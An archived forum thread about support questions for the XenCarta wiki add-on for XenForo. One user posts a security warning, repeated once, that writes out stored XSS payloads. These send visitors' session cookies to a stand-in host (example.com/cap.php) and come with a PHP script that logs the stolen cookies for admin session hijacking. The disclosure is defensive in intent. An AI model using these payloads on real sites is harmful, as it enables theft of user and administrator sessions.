-
This forum has been archived. New threads and replies may not be made. All add-ons/resources that are active should be migrated to the Resource Manager. See this thread for more information.
[8wayRun.Com] XenCarta (Lite Wiki)
- Thread starter Jaxel
- Start date
- Status
Digital Doctor
Well-known member
Do you mean the Wiki Navigation box in the right hand column ?
Digital Doctor
Well-known member
Panupat
Well-known member
no, I mean the automatic TOC that shows up when there's <h> tags in the content.
We need a search thread option...Anthony,
Did you ever have this work out? Citation would make all the links neatly sit at the footer.
Dion Sune Jensen
Active member
The TOC behavior is very weird, and I haven't been able to find out how to change it.
Right now: it inserts the TOC right before the first header, which means if the header is inside a table, the TOC will be inside that table.
What i would like: the TOC is always inserted at the top, above all content on the wiki page, and is wrapped in it's own div, so it can be separately styled.
I havent been able to find any template containing the TOC styling options, so im guessing it's hardcoded?
Right now: it inserts the TOC right before the first header, which means if the header is inside a table, the TOC will be inside that table.
What i would like: the TOC is always inserted at the top, above all content on the wiki page, and is wrapped in it's own div, so it can be separately styled.
I havent been able to find any template containing the TOC styling options, so im guessing it's hardcoded?
Anthony Parsons
Well-known member
I just created my own Andy, manually, being a numbered list of references at the bottom, then inserting a [1] and so forth within the text. I did play with a template to do it, performing super-script, but didn't like it.
Any sample to look at, Anthony?
I was thinking of that manual way to fall back as well but if I allow several people to edit the wiki, it will be a mess real quick since nobody takes care of making sure the reference is updated correctly.
Ryan,
Which template you edit to have AzuCloud show up on the bottom of the Xencarta Wiki index? Does it show on the wiki page as well?
Thanks
Ryan Kent
Well-known member
If I recall correctly, there was not any extra template edit. ACP > Applications > AzuCloud > Options > Active Controllers
Add: EWRcarta_ControllerPublic_Wiki:index
B
bogus
Guest
I have two issues.
If i add a new page (BBCode) the bbcode QUOTE will vanish after a while. Did happen now the 4 time. I add Text in Quote and after some days just the Text, without the Quote Tag is displayed.
Also the BOLD Code in H3 Text will be displayed in the URL. Is there a way to get rid of the BBCode in URLs
http://www.brainlag.eu/wiki/frequen...n-b-b-wiederherstellen-b-b-b-b-data-restore-b
and to keep the Quote Code permanently?
If i add a new page (BBCode) the bbcode QUOTE will vanish after a while. Did happen now the 4 time. I add Text in Quote and after some days just the Text, without the Quote Tag is displayed.
Also the BOLD Code in H3 Text will be displayed in the URL. Is there a way to get rid of the BBCode in URLs
http://www.brainlag.eu/wiki/frequen...n-b-b-wiederherstellen-b-b-b-b-data-restore-b
and to keep the Quote Code permanently?
tenants
Well-known member
Looked good, but I found a nasty security issue with this wiki when allowing html in the wiki
<< Please pay attention to this. Any one that has installed this wiki plug in and allows users to add there own HTML will be open to this security issue
I started to use this my self until I realised script was live
The user / wiki writer only needs to insert script to capture the session cookie, example:
1st example
<a href = "javascript: location.href='http://www.example.com/cap.php?cookie='+document.cookie;">dont click this</a>
2nd example (just embed script .. you could do this with a hidden iframe, and the user wouldnt even know)
<script>location.href='http://www.example.com/cap.php?cookie='+ document.cookie;</script>
For demonstration, you can see the cookie on your own wiki by directly adding the following html to a wiki page (and then refreshing the page):
demonstration example
<script>alert(document.cookie)</script>
The first example allows the attacker to take the cookie of any visitor that visits a page that contains the script (including admins),
The attacker sends this cookie to their own page at http://www.example.com/cap.php
a simple cap.php page that will take this cookie:
<?php
$cookie = $_GET[' cookie']; // yes, I know its an unprotected request
$fp = fopen(‘cookies.txt’, ‘a’);
fwrite($fp, $cookie);
fclose($fp);
?>
This cookie can then be saved locally and used to replace their own cookie
If an admin visits this page, the attacker can log in with the admin session
[I didn't want to offend anyone, I'm just pointing out what I saw]
<< Please pay attention to this. Any one that has installed this wiki plug in and allows users to add there own HTML will be open to this security issue
I started to use this my self until I realised script was live
The user / wiki writer only needs to insert script to capture the session cookie, example:
1st example
<a href = "javascript: location.href='http://www.example.com/cap.php?cookie='+document.cookie;">dont click this</a>
2nd example (just embed script .. you could do this with a hidden iframe, and the user wouldnt even know)
<script>location.href='http://www.example.com/cap.php?cookie='+ document.cookie;</script>
For demonstration, you can see the cookie on your own wiki by directly adding the following html to a wiki page (and then refreshing the page):
demonstration example
<script>alert(document.cookie)</script>
The first example allows the attacker to take the cookie of any visitor that visits a page that contains the script (including admins),
The attacker sends this cookie to their own page at http://www.example.com/cap.php
a simple cap.php page that will take this cookie:
<?php
$cookie = $_GET[' cookie']; // yes, I know its an unprotected request
$fp = fopen(‘cookies.txt’, ‘a’);
fwrite($fp, $cookie);
fclose($fp);
?>
This cookie can then be saved locally and used to replace their own cookie
If an admin visits this page, the attacker can log in with the admin session
[I didn't want to offend anyone, I'm just pointing out what I saw]
Digital Doctor
Well-known member
Aren't there really 100s of security threats when you allow someone to use HTML ?
Isn't that why you don't allow people to embed HTML ?
Besides stealing cookies, wouldn't there be even nastier exploits ?
When you are allowing people to embed HTML, I think the only security that will ever protect you is
(1) don't allow HTML in the wiki
(2) if you allow HTML in the wiki, you'd better be damn sure the person is on your side.
Q: what are the default "HTML in the wiki" settings ? Default = No ?
Isn't that why you don't allow people to embed HTML ?
Besides stealing cookies, wouldn't there be even nastier exploits ?
When you are allowing people to embed HTML, I think the only security that will ever protect you is
(1) don't allow HTML in the wiki
(2) if you allow HTML in the wiki, you'd better be damn sure the person is on your side.
Q: what are the default "HTML in the wiki" settings ? Default = No ?
tenants
Well-known member
Yes there are many, taking the admin session is easy to demonstrate (admin accounts can then be used to do more damage, etc)
I don't know what the default option is, I just set it up (I dont remember turning HTML on, but I may be mistaken). I'm still figuring out where all the options are for this, so I dont think I would have changed it (still new to xenforo)
On creating a Wiki page, there were two options
Data type = BB Code
and
Data type = HTML
Flicking these data types looks like it's available to anyone with edit /create permissions
I don't remember turning anything related to HTML on... maybe I did. I just gave it a quick try out (looked good). But it really should be pointed out that the allow HTML should never be used for public (or any other use other than yours - the admin)
.. I'm still new to the plug-in, so maybe its never intended to be used with the html option
Where do I turn this html Data Type option off/On? I want users to be able to create there own wiki pages / update others, but the HTML data-type is a no-no
I don't know what the default option is, I just set it up (I dont remember turning HTML on, but I may be mistaken). I'm still figuring out where all the options are for this, so I dont think I would have changed it (still new to xenforo)
On creating a Wiki page, there were two options
Data type = BB Code
and
Data type = HTML
Flicking these data types looks like it's available to anyone with edit /create permissions
I don't remember turning anything related to HTML on... maybe I did. I just gave it a quick try out (looked good). But it really should be pointed out that the allow HTML should never be used for public (or any other use other than yours - the admin)
.. I'm still new to the plug-in, so maybe its never intended to be used with the html option
Where do I turn this html Data Type option off/On? I want users to be able to create there own wiki pages / update others, but the HTML data-type is a no-no
tenants
Well-known member
I've just registered with a few sites and noticed that lots of forums alow users to edit the HTML content
This is not safe
- don't allow users to add there own html
- never allow user to add there own script
- never trust user content.
I'm not sure what else I can do to warn people. This is not a secure plug-in and can lead to someone loggin in with your admin account and doing what they want
see: http://xenforo.com/community/threads/8wayrun-com-xencarta-lite-wiki.7589/page-31#post-242498
This is not safe
- don't allow users to add there own html
- never allow user to add there own script
- never trust user content.
I'm not sure what else I can do to warn people. This is not a secure plug-in and can lead to someone loggin in with your admin account and doing what they want
see: http://xenforo.com/community/threads/8wayrun-com-xencarta-lite-wiki.7589/page-31#post-242498
Anthony Parsons
Well-known member
This is a secure plugin, but the moment you allow any user to parse HTML content, that is the moment "YOU" open up your forum to being hijacked.
There is a HTML mod available here, which again, allows "YOU" to assign HTML rights to usergroups. IF you assign such rights to untrusted people, then "YOU" are an idiot as an admin.
- Status